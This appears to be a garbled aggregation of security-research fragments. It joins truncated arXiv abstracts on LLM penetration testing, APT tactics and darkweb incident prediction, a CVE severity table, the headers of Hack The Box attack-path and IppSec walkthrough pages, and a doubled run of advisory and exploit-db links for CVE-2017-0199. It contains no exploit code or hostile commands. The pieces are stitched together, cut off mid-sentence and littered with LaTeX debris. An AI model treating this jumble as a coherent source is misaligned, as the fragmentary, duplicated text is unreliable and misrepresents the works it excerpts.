## Abstract
With the increasing complexity of cyberattacks, the proactive and f
arXiv
PentestAgent: Incorporating LLM Agents to Automated Penetration Testing
arxiv_fulltext·2025-05-29
PentestAgent: Incorporating LLM Agents to Automated Penetration Testing
PentestAgent: Incorporating LLM Agents to Automated Penetration Testing
Xiangmin Shen
Northwestern University
Evanston
Illinois
USA
[email protected]
Both authors contributed equally to this work.
Lingzhi Wang
Northwestern University
Evanston
Illinois
USA
[email protected]
[1]
Zhenyuan Li
Zhejiang University
Hangzhou
Zhejiang
China
[email protected]
Yan Chen
Northwestern University
Evanston
Illinois
USA
[email protected]
Wencheng Zhao
Ant Group
Hangzhou
Zhejiang
China
[email protected]
Dawei Sun
Ant Group
Hangzhou
Zhejiang
China
[email protected]
Jiashui Wang
Zhejiang University
Hangzhou
Zhejiang
China
[email protected]
Wei Ruan
Zhejiang University
Hangzhou
Zhejiang
China
[email protected]
Shen et al.
## Abstract
arXiv
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
arxiv_fulltext·2025-02-12
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Almuthanna Alageel
and
Sergio Maffeis
Department of Computing
Imperial College London
London, United Kingdom
plain
plain
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
arXiv
Linking Threat Tactics, Techniques, and Patterns with Defensive Weaknesses, Vulnerabilities and Affected Platform Configurations for Cyber Hunting
arxiv_fulltext·2021-02-10·CVSS 8.8
CVE-2017-11882 [HIGH] Linking Threat Tactics, Techniques, and Patterns with Defensive Weaknesses, Vulnerabilities and Affected Platform Configurations for Cyber Hunting
Top 10 Most Exploited Vulnerabilities 2016-2019
(https://us-cert.cisa.gov/ncas/alerts/aa20-133a)
.83fcdec8a329824466f140a2e6cdfeec473a9ee2 .0
longtable[]@lllllll@
& CVSS Score & Number of Tactics & Number of Techniques &
Number of CAPECs & Number of CWEs & Number of CPEs
CVE-2017-11882 & 8.55 & 0 & 0 & 12 & 1 & 4
CVE-2017-0199 & 8.55 & 0 & 0 & 0 & 0 & 9
CVE-2017-5638 & 10.0 & 1 & 3 & 51 & 1 & 53
CVE-2012-0158 & 9.3 & 0 & 0 & 3 & 1 & 29
CVE-2019-0604 & 8.65 & 1 & 3 & 51 & 1 & 4
CVE-2017-0143 & 0.0 (not listed in BRON but NVD says high severity)
& 0 & 0 & 0 & 0 & 0
CVE-2018-4878 & 8.65 & 0 & 0 & 0 & 1 & 3
CVE-2017-8759 & 8.55 & 1 & 3 & 51 & 1 & 8
CVE-2015-1641 & 9.3 & 0 & 0 & 0 & 1 & 11
CVE-2018-7600 & 8.65 & 1 & 3 & 51 & 1 & 4
longtable
4 out of Top 10 Vulnerabilities share the follow
arXiv
Mining user interaction patterns in the darkweb to predict enterprise cyber incidents
arxiv_fulltext·2020-06-20
Mining user interaction patterns in the darkweb to predict enterprise cyber incidents
Mining user interaction patterns in the darkweb to predict enterprise cyber incidents
Soumajyoti Sarkar Mohammad Almukaynizi Jana Shakarian Paulo Shakarian
S. Sarkar, M. Almukaynizi, P. Shakarian
Arizona State University
[email protected]
[email protected]
[email protected]
J. Shakarian
Cyber Reconnaissance Inc.
[email protected]
Received: date / Accepted: date
## Abstract
With rise in security breaches over the past few years, there has been an increasing need to mine insights from social media platforms to raise alerts of possible attacks in an attempt to defend conflict during competition. In this study, we attempt to build a framework that utilizes unconventional signals from the darkweb forums by leveraging the reply network structure of user interactions with the goal of predicting
CTF
attack-paths
ctf_writeups·CVSS 6.0
[MEDIUM] attack-paths
---
layout: default
title: Attack Paths
nav_order: 8
description: "Visual attack path flowcharts for popular HTB machines - from reconnaissance to root"
permalink: /attack-paths/
---
# Attack Path Diagrams
{: .fs-9 }
Visual flowcharts mapping the complete attack chain for 30 popular Hack The Box machines, from initial reconnaissance to root/SYSTEM.
{: .fs-6 .fw-300 }
---
## How to Read These Diagrams
Each diagram traces the full exploitation path for a machine using a top-down flowchart. The color coding indicates the phase of the attack:
- **Green nodes** - Reconnaissance and enumeration
- **Orange nodes** - Initial access / foothold
- **Blue nodes** - Post-exploitation and lateral movement
- **Red nodes** - Privilege escalation
- **Purple nodes** - Root or SYSTEM achieved
Nodes in
CTF
ippsec-video-index
ctf_writeups·CVSS 8.6
[HIGH] ippsec-video-index
# IppSec HTB Video Index - Complete Reference
> The most comprehensive index of IppSec's HackTheBox video walkthroughs.
> Data sourced from [ippsec.rocks](https://ippsec.rocks) dataset, GitHub, and community resources.
> Last updated: 2026-04-10
## Stats
| Category | Count |
|----------|-------|
| HTB Machine Walkthroughs | 432 |
| UHC (Ultimate Hacking Championship) | 12 |
| HTB Sherlocks (DFIR) | 7 |
| VulnHub Machines | 4 |
| Tutorials / Methodology / Special | 61 |
| HTB Academy Modules | 17 |
| **Total Unique Content** | **533** |
| Total Searchable Entries (timestamps) | 9,245 |
## Key Resources
| Resource | URL |
|----------|-----|
| YouTube Channel | [youtube.com/ippsec](https://youtube.com/ippsec) |
| Searchable Video Index | [ippsec.rocks](https://ippsec.rocks) |
| GitHub |
http://rewtin.blogspot.nl/2017/04/cve-2017-0199-practical-exploitation-poc.htmlhttp://www.securityfocus.com/bid/97498http://www.securitytracker.com/id/1038224https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199https://www.exploit-db.com/exploits/41894/https://www.exploit-db.com/exploits/41934/https://www.exploit-db.com/exploits/42995/https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.htmlhttps://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/http://rewtin.blogspot.nl/2017/04/cve-2017-0199-practical-exploitation-poc.htmlhttp://www.securityfocus.com/bid/97498http://www.securitytracker.com/id/1038224https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199https://www.exploit-db.com/exploits/41894/https://www.exploit-db.com/exploits/41934/https://www.exploit-db.com/exploits/42995/https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.htmlhttps://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-0199
2017-04-12
Published
2021-11-03
Added to CISA KEV
Exploited in the wild